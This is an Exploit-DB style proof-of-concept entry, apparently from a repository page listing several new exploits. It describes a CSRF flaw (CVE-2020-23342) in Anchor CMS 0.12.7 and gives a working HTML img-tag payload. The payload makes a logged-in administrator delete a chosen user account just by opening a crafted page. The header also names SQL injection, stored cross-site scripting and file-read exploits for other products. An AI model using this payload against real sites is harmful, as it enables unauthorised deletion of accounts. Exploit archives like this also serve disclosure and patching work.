aa473257e9
5 changes to exploits/shellcodes Online Documents Sharing Platform 1.0 - 'user' SQL Injection Apartment Visitors Management System 1.0 - 'email' SQL Injection Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit) Anchor CMS 0.12.7 - CSRF (Delete user)
19 lines
No EOL
576 B
HTML
19 lines
No EOL
576 B
HTML
# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
|
|
# Exploit Author: Ninad Mishra
|
|
# Vendor Homepage: https://anchorcms.com/
|
|
# Software Link: https://anchorcms.com/download
|
|
# Version: 0.12.7
|
|
# CVE : CVE-2020-23342
|
|
|
|
|
|
###PoC
|
|
the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html
|
|
|
|
================================
|
|
<img src="http://target/anchor/index.php/admin/users/delete/21">
|
|
================================
|
|
Where (21) is the user id .
|
|
|
|
When admin clicks on exploit.html link
|
|
|
|
User with id 21 will be deleted |